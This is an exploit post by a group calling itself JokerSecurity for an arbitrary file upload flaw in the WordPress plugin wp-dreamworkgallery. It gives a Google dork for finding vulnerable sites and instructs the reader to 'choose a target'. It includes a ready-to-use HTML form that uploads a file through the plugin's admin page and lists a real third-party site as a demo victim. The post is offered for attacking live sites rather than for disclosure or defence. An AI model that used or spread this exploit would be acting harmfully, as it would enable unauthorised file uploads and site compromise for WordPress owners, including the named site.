Wordpress File Upload Vulnerability 2017

1. ##################################################JokerSecurity#########################################################
2. # Title : Wordpress File Upload Vulnerability 2017
3. # Dork : inurl:/wp-content/plugins/wp-dreamworkgallery
4. # Tested on: [ Kali-Linux]
5. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
6. # Myblog : http://kader-information.blogspot.com/
7. # Link video : https://www.youtube.com/watch?v=h1xWghkVPEw
8. ######################
9. # [+] DESCRIPTION :
10. ######################
11.  
12. # 1: Search Google Dork and Choose a Target
13.  
14. ###########
15. Code exploit :
16. ###########
17. <html>
18. <body>
19. <form action="http://www.site.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
20. <input type="hidden" name="task" value="drm_add_new_album" />
21. <input type="hidden" name="album_name" value="Arbitrary File Upload" />
22. <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
23. <input type="file" name="album_img" value="" />
24. <input type="submit" value="Submit" />
25. </form>
26. </body>
27. </html>
28.  
29. ######
30.  
31. # 3 Upload Your File ==== File.html
32.  
33. ######
34. Demo :
35. ######
36. http://www.theatredumordant.fr/wp-content/plugins/wp-dreamworkgallery/xml/drm_all.xml
37.  
38. ######################
39.  
40. subscribe for my channel and page in facebook
41.  
42. # My Blogger : http://kader-information.blogspot.com/
43.  
44. # Page FacebOOk 1 : https://www.facebook.com/AnonymousPalestine.vip
45.  
46. # Page Facebook 2 : http://facebook.com/kali.linux.pentesting.tutorials/
47.  
48. # Page FacebOOK 3 : https://www.facebook.com/Professional.hacker.25/
49.  
50. By <3
51.  
52. ##################################################JokerSecurity#########################################################